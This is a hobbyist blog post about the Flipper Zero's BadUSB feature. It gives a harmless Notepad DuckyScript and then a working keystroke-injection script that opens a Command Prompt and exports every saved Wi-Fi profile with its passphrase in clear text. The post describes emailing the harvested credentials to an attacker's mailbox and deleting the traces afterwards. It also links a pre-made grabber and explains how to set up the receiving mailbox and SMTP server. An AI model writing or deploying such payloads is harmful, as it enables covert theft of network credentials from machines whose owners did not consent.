You might be wondering what the heck this gadget is. This device is called a Flipper Zero and, as one of the early Kickstarter backers, I am one of the few thousand proud owners of this gizmo as of this writing. In a nutshell, the Flipper Zero is a pocket-sized wireless analyzer, capable of capturing, analyzing, and replaying radio signals, RFID data, and more. As I write this, large amounts of data are being contributed by Flipper Zero owners to GitHub repositories; databases of brand-name TVs and their remote codes are one example. Some consider the Flipper Zero's capabilities to still be in their infancy, with firmware updates releasing on what seems like a near-weekly basis as of late. You can get a firsthand look at the collaboration already in full swing among Flipper Zero owners over at their Discord channel: https://flipperzero.one/discord
The Discord is separated into sub-channels that relate to each feature of the device (e.g. The infrared remote capability, the SubGHZ capability, the BadUSB capability, etc).
This device can read NFC chips as well as RFID cards, badges, and fobs. It can also capture and replay wireless codes and, by virtue of this, control ceiling fans, TVs, and more with its Sub-GHz and infrared functionality. But its abilities don't stop there. It can also act as a "BadUSB", which runs Rubber Ducky scripts.
By plugging the Flipper Zero into a computer (either Mac or PC, depending on the script you've written) and choosing the BadUSB option, you can choose to "Run" any of the scripts you've saved. We are provided with a demo script for both Windows and Mac by the developers of Flipper Zero, but what if we want to create our own? How do we do that? And what can these scripts truly do?
The idea of BadUSB/Rubber Ducky scripts is that a device with this feature, when plugged into a computer, presents itself not as a USB stick at all but as a keyboard (a USB HID device), and the computer accepts it as one without any prompt, just as it would any keyboard you plug in. The genius of these devices is that they are essentially keyboards with a brain. That "brain" is the script you've prewritten and loaded onto it. So as soon as this imposter of a keyboard is plugged in (and, in the Flipper Zero's case, the chosen script is told to run), it goes to work typing out that script, with whatever rights the currently logged-in user has, as if there were a ghost in the room.
So what can that script do? Well, essentially anything the logged-in user could type. Aside from the more tech-savvy and old-school computer geeks out there, most of us can't imagine using a computer without a touchpad or a mouse, but the reality is that everything on your computer is reachable from the Command Prompt (or PowerShell) on Windows or the Terminal on a Mac, and in the world of these non-GUI interfaces no mouse is needed. These text-only terminals were the precursor to the modern graphical user interface we all know and love, and yet they still exist as a feature running under the hood, should we ever need or decide to use them.
Rubber Ducky scripts for Windows, as an example, might begin with a Windows key + R command (written in Rubber Ducky script as "GUI r") to open the Run window. From there, they go on to the next pre-scripted command, which might be typing "notepad.exe" and pressing Enter. This opens the Notepad app from the Run window. Then maybe we want it to type a message such as "Hello world!!". Or the script could use that same Run window to launch cmd.exe (the Windows Command Prompt) instead.
If you're wondering just what can be accessed from the Command Prompt in Windows, well...the sky is the limit. It could be scripted to open popular applications, certainly those bundled with Windows. It could be used to access the Windows Registry editor (essentially the backbone of the OS, which contains settings for the entire system) to collect information or make changes. It could even dump the saved Wi-Fi profiles (SSIDs together with their passwords) that Windows keeps for every network the machine has been told to remember, save those to a new file, and email that file to the attacker's mailbox. The email then arrives with an attachment of cleartext passwords for every Wi-Fi network the laptop still has a saved profile for (networks the user has told Windows to forget are gone from that store).
If you happen to be the lucky owner of a Flipper Zero, you can follow this fantastic tutorial video by Ut4y0 to learn how to get set up for writing a Ducky script for your Flipper: https://www.youtube.com/watch?v=rf5UJFMSGtE
The above video explains how to write Rubber Ducky scripts in Notepad++. Think of Notepad++ as the evolution of the simple Notepad app we are all accustomed to on Windows. It's used by programmers to better organize the syntax they are typing out, and it has syntax highlighting that color-codes text it recognizes as keywords or commands of the particular language in use. There's more to it than that, but I am only interested in scratching the surface of this app for the purpose of this post.
Before Notepad++ can highlight a Rubber Ducky script for you, you need to download something called a User Defined Language file. This is an XML file that tells Notepad++ how to recognize the syntax you're typing as Duckyscript (in this case). The highlighting is a convenience, not a requirement: the Flipper only ever sees the plain text file.
Once that is imported into Notepad++ and selected as the language in use, you're ready to go. My first sample is a very basic Ducky script. All it does is use GUI r (Windows key + R) to open Notepad and type the text "You've been Rubber Duckied courtesy of the Flipper Zero you just plugged in!"
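Written out as an added example for the Flipper's BadUSB, this is my rendering of what that basic script does (not a file from the Flipper developers or from the tutorial video). It assumes the Flipper convention of saving scripts as .txt files in the badusb folder on the SD card; the key letter after GUI is written in lowercase as in the Flipper's own demo script, and the DELAY values are my guesses, which you may need to lengthen on a slow machine:

```duckyscript
REM Added example: open Notepad and type a message (Windows target)
REM Give the host time to finish enumerating the Flipper as a keyboard
DELAY 1000
REM Windows key + R opens the Run dialog
GUI r
DELAY 500
REM Type the program name into Run and press Enter
STRING notepad
ENTER
REM Wait for the Notepad window to appear and take focus
DELAY 1000
REM Everything after STRING is typed literally into Notepad
STRING You've been Rubber Duckied courtesy of the Flipper Zero you just plugged in!
```

Plug the Flipper in, open Bad USB, pick the file, and choose Run. If the message shows up truncated or in the Run box instead of Notepad, the DELAY before the STRING line was too short for that machine.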
The second script is much more complicated. It uses GUI d (Windows key + D) to show the desktop first, so that the commands that follow land on the right part of the OS instead of being typed into whatever application happens to have focus. It once again uses GUI r to open the Run window, but this time with far more powerful intentions than just displaying a message in Notepad. It launches the Command Prompt and reads the Wi-Fi network names and passwords of every network the machine has saved. But it goes even further, packaging this information and sending it out to the attacker's email as a zip attachment that holds all the credentials as XML files, which can be downloaded and opened right in your browser. Lastly, the script deletes the directory it created at the start. This cleanup step is a standard part of any data exfiltration process, though it only removes the staging folder: Windows still records the new "keyboard" in its setupapi device log and registry, and the Command Prompt window and the typed commands are visible to anyone sitting at the machine while the script runs.
If you're wondering why you keep seeing "DELAY" throughout the scripts: it pauses the script for the given number of milliseconds and acts as a safety buffer, giving the computer time to catch up with keystrokes the Flipper Zero injects far faster than any human types. The Flipper has no way of knowing when the Run window or the Command Prompt has actually appeared, so without a DELAY (or with one that is too short) the following keystrokes are typed before their target window exists and end up lost or in the wrong window; the script silently goes off the rails rather than reporting an error. How long to wait depends on the speed of the computer, but when writing these scripts the idea is to make them as universally effective as possible against any target, slow or fast, which means erring on the side of longer delays. The Flipper also supports DEFAULT_DELAY, which sets a pause applied before every following command so you don't have to write DELAY on each line.
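As an added example covering both the grabber walkthrough and the DELAY explanation above (this is not Gioman101's grabber nor the script from the video), here is the collection half of such a script for the Flipper: it shows the desktop, opens a Command Prompt, and exports every saved Wi-Fi profile with its key in clear using the standard netsh command Windows provides for that. It stops at collection, so no zipping, mailing, or cleanup; the staging folder %TEMP%\wifi and the DELAY values are my own choices:

```duckyscript
REM Added example: export saved Wi-Fi profiles (with keys) to %TEMP%\wifi
REM Pause before every command; explicit DELAY lines add to this
DEFAULT_DELAY 300
REM Let the host finish enumerating the keyboard
DELAY 1500
REM Windows key + D shows the desktop so nothing lands in an open app
REM (it toggles, so it only helps when windows are actually open)
GUI d
DELAY 500
REM Run dialog, then a Command Prompt
GUI r
DELAY 500
STRING cmd
ENTER
REM cmd takes noticeably longer than Notepad to appear on slow machines
DELAY 1500
REM netsh needs the target folder to exist before it can export
STRING mkdir "%TEMP%\wifi"
ENTER
REM One XML file per saved SSID; key=clear puts the passphrase in <keyMaterial>
STRING netsh wlan export profile key=clear folder="%TEMP%\wifi"
ENTER
REM Give netsh time to write every profile before doing anything else
DELAY 2000
STRING exit
ENTER
```

After it runs, open %TEMP%\wifi in Explorer: each file is one saved network, and the passphrase sits in the keyMaterial element, which is what the zip attachment described above contains. If the folder is empty, the most likely cause is the DELAY after STRING cmd being too short, so the mkdir and netsh lines were typed into the Run box instead of the prompt.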
If you'd like to take advantage of a pre-made Wi-Fi grabber script, look no further than this one, courtesy of Gioman101:
https://github.com/Gioman101/BadUSBwifi-grabberFlipper
*You will need to enter your email address and your email password in place of the placeholders in the script to receive the zip file of credentials that it sends out. Keep in mind that those mailbox credentials sit in cleartext in the script on the Flipper's SD card and get typed into the target machine, so use a throwaway mailbox created for this purpose, never your real account. Please also note that for this to work with a Gmail address, you will need to have Google generate a random third-party App Password for you (which requires 2-Step Verification to be turned on for the account). You can do so by navigating to https://myaccount.google.com/security , signing in, and clicking the "App Passwords" section. Google is retiring its "less secure app access" option at the end of May 2022, so beyond that date it is possible this may only work with accounts set up outside the realm of Google/Gmail (alternatives include Outlook.com addresses, which are free at their base level, as well as Proton email addresses).

If using an alternative to Gmail, a handy list of mail server addresses and ports can be found here: https://www.arclab.com/en/kb/email/list-of-smtp-and-pop3-servers-mailserver-list.html That server and port information will also need to be filled into the placeholders in the script in place of the Gmail values.